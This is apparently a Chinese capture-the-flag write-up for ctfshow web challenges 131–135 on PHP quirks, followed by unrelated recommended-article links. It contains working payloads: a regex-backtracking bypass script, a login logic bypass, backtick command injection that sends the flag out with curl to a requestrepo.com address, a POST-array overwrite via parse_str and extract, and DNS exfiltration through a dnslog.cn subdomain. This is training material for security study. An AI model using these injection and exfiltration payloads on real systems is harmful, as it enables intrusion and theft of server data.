ctfshow web入门 php特性 web131-web135

1.web131

和上题一样差不多,正则最大回溯次数绕过

python 复制代码
import requests
url=""
data={'f':'very'*250000+'360Dctfshow' } r=requests.post(url,data=data)
print(r.text)

2.web132

通过扫描发现robots.txt,访问/admin发现源码

&&和||都是短路运算符

只要满足code和password是错的且code和username为admin即可得到flag

payload:

复制代码
username=admin&password=aa&code=admin

3.web133

复制代码
get传参   F=`$F `;sleep 3
经过substr($F,0,6)截取后 得到  `$F `;
也就是会执行 eval("`$F `;");
我们把原来的$F带进去
eval("``$F `;sleep 3`");
也就是说最终会执行  `   `$F `;sleep 3  ` == shell_exec("`$F `;sleep 3");
前面的命令我们不需要管,但是后面的命令我们可以自由控制。
这样就在服务器上成功执行了 sleep 3
所以 最后就是一道无回显的命令执行题目了

写文件试了不行,应该是没权限

通过curl进行外带,curl只能带出一排数据,可以直接筛选flag进行带出

利用的平台是https://requestrepo.com/

payload:

复制代码
F=`$F%20`;curl%20http://1gfmb9cm.requestrepo.com?1=`cat%20f*|grep%20flag`

4.web134

复制代码
<?php
parse_str($_SERVER['QUERY_STRING']);
var_dump($_POST);?>
然后我们传入 _POST['a']=123
会发现输出的结果为array(1) { ["'a'"]=> string(3) "123" }
也就是说现在的$_POST['a']存在并且值为123
题目中还有个extract($_POST)
extract() 函数从数组中将变量导入到当前的符号表,也就是说把键名当作变量名,值作为变量的值
这样的话 $a==123

payload:

复制代码
_POST[key1]=36d&_POST[key2]=36d

5.web135

curl外带不行了,被过滤了还可以用ping外带

试一下写文件

复制代码
1.
访问1.txt即可
F=`$F `;cp flag.php 1.txt 
2.ping外带
`cat flag.php|awk 'NR==2'`.6x1sys.dnslog.cn
awk利用NR一排排的带数据

php特性

相关推荐
咖啡无伴侣5 小时前
unplugin-auto-import 使用详解+面试高频考点
前端·架构
C137的本贾尼5 小时前
第七篇:消息队列(MQ)——就是个带存储的异步通信管道
java·开发语言·中间件
搬砖记录员5 小时前
录屏文件打不开?H.265兼容性踩坑与4种实战方案
前端
明月_清风5 小时前
SEO 完全指南:从底层原理到实战应用场景
前端·seo
默_笙5 小时前
🚲 手写一个"Claude Code":我用 LangChain + ReAct 循环,让 AI 自己读文件、解释代码
前端·javascript
星河耀银海5 小时前
框架结合:Vue+HTML5+AI实现智能前端应用开发
前端·vue.js·html5
等咸鱼的狸猫6 小时前
# JS 核心六大主题:闭包内存模型、原型链查找、事件流机制与 Promise / Event Loop 实现视角复盘
前端·javascript
从零开始的代码生活_6 小时前
C++ list 原理与实践:双向链表、迭代器与简化实现
开发语言·c++·后端·学习·算法·链表·list
hy.z_7776 小时前
【C语言】11. 深入理解指针1
c语言·开发语言
charlie1145141916 小时前
现代C++工程实践——WeakPtr 第二关:核心骨架与控制块
开发语言·c++